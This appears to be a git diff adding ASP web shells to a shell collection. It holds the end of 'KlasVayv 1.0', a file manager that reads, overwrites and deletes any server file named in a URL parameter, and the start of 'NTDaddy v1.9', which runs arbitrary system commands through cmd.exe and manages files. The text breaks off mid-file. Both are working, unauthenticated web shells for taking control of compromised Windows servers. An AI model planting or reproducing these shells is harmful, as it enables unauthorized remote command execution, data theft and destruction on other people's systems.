+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Sürücü Adý</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boþ Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Ýþlem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Diðer"
+	case 1 teype="Taþýnýr"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="klasvayv.asp?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="klasvayv.asp?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href="klasvayv.asp"><input type="reset" size="16"
+		name="x" value="Vazgeç"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="klasvayv.asp?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="klasvayv.asp?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">Sürücüler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="klasvayv.asp?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/ASP/ntdaddy.asp.txt b/xakep-shells/ASP/ntdaddy.asp.txt
new file mode 100644
index 0000000..bbcba0a
--- /dev/null
+++ b/xakep-shells/ASP/ntdaddy.asp.txt
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
